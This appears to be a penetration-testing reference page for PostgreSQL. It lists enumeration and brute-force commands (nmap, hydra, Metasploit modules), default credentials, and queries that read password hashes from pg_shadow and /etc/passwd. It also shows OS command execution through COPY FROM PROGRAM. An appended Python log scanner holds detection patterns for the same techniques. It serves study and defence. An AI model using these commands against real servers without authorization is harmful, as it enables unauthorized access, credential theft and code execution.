5432 - PostgreSQL

PostgreSQL is an open source database which can be found mostly in Linux operating systems. However, it is compatible with multiple operating systems and also runs on Windows and macOS. If the database is not properly configured and credentials have been obtained, it is possible to perform various activities, such as reading and writing system files and executing arbitrary code.

Enumeration

Nmap

Version disclosure

Use nmap -sV -p 5432 10.0.0.1

Bruteforce credentials:

nmap -p 5432 --script pgsql-brute <target>

Metasploit

Version disclosure

auxiliary/scanner/postgres/postgres_version

Bruteforce login:

auxiliary/scanner/postgres/postgres_login

Dump schema:

auxiliary/scanner/postgres/postgres_schemadump

Database enumeration:

auxiliary/admin/postgres/postgres_sql

Hashdump:

auxiliary/scanner/postgres/postgres_hashdump

Read files:

auxiliary/admin/postgres/postgres_readfile

Reverse shell:

exploit/linux/postgres/postgres_payload

Login

Login using psql:

psql -h 192.168.100.11 -U postgres

Common/default credentials

| Username | Password |
| --- | --- |
| postgres | postgres |
| postgres | password |
| postgres | admin |
| admin | admin |
| admin | password |

Bruteforce login credentials:

hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.120 postgres

Commands

| Description | Command |
| --- | --- |
| List databases | \l |
| List database users | \du |
| List existing tables | \dt |
| Connect to a specific database | \c database_name; |
| Get detailed information on a table | \d+ table_name |
| Get table content | select * from table_name; |
| Retrieving database passwords | SELECT * FROM users; OR select usename, passwd from pg_shadow; |
| Dumping databases content | SELECT usename, passwd FROM pg_shadow; OR pg_dump --host=192.168.100.11 --username=postgres --password --dbname=template1 --table='users' -f output_pgdump |
| Create a new database | CREATE DATABASE db_name; |
| Exit the database | \q |

Command execution

PostgreSQL databases can interact with the underlying operating system, allowing the database administrator to execute various database commands and retrieve output from the system.

Run:

postgres=# select pg_ls_dir('./');

By executing the following command, it is possible to read server-side postgres files.

postgres=# select pg_read_file('PG_VERSION', 0, 200);

It is also possible to create a database table to store and view the contents of a file that exists on the host.

postgres=# CREATE TABLE temp(t TEXT);
postgres=# COPY temp FROM '/etc/passwd';
postgres=# SELECT * FROM temp;

OR use the Metasploit module:

auxiliary/admin/postgres/postgres_readfile

Execute command

CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'sudo -l';
SELECT * FROM cmd_exec;
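
On the defensive side, the file-read, hash-read and command-execution statements above are easy to spot in the server log when statement logging is enabled. The following is an added example, not part of the original page: it scans constructed log lines, assuming log_statement = 'all' and the log prefix shown in the sample; the rule names and the scan function are illustrative.

```python
import re
from collections import Counter

# Rules for the server-side file and command primitives shown on this page.
# Ordered by severity; the first match wins. Rule names are illustrative.
RULES = [
    ("os-command-exec", re.compile(r"\bcopy\b.+\b(?:from|to)\s+program\b", re.I | re.S)),
    ("server-file-copy", re.compile(r"\bcopy\b.+\b(?:from|to)\s+'", re.I | re.S)),
    ("server-file-read", re.compile(r"\bpg_(?:read_file|read_binary_file|ls_dir)\s*\(", re.I)),
    ("password-hash-read", re.compile(r"\bpg_(?:shadow|authid)\b", re.I)),
]
STATEMENT = re.compile(r"LOG:\s+statement:\s+(.*)$", re.S)
AUTH_FAIL = re.compile(r'FATAL:\s+password authentication failed for user "([^"]+)"')

def scan(lines, fail_threshold=3):
    """Return (alerts, noisy): alerts is a list of (rule, sql) tuples and noisy
    maps each role with at least fail_threshold failed logins to its count."""
    alerts, failures = [], Counter()
    for line in lines:
        failed = AUTH_FAIL.search(line)
        if failed:
            failures[failed.group(1)] += 1
            continue
        stmt = STATEMENT.search(line)
        if not stmt:
            continue
        sql = stmt.group(1).strip()
        for name, pattern in RULES:
            if pattern.search(sql):
                alerts.append((name, sql))
                break
    noisy = {role: n for role, n in failures.items() if n >= fail_threshold}
    return alerts, noisy

# Constructed sample log; the prefix format (timestamp, pid, user@db) is an assumption.
P = "2024-05-01 10:00:00 UTC [4101] postgres@postgres "
SAMPLE = [P + 'FATAL:  password authentication failed for user "postgres"'] * 3 + [
    P + "LOG:  statement: select pg_ls_dir('./');",
    P + "LOG:  statement: select pg_read_file('PG_VERSION', 0, 200);",
    P + "LOG:  statement: COPY temp FROM '/etc/passwd';",
    P + "LOG:  statement: COPY cmd_exec FROM PROGRAM 'sudo -l';",
    P + "LOG:  statement: SELECT usename, passwd FROM pg_shadow;",
    P + "LOG:  statement: COPY orders TO STDOUT;",  # benign: client-side copy
    P + "LOG:  statement: select * from table_name;",  # benign
]

if __name__ == "__main__":
    alerts, noisy = scan(SAMPLE)
    for rule, sql in alerts:
        print(f"{rule:20} {sql}")
    print("failed logins:", noisy)
```

COPY with a quoted file name or the PROGRAM keyword always runs on the server, while COPY ... TO STDOUT (as used by pg_dump) streams to the client, which is why only the former is flagged.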
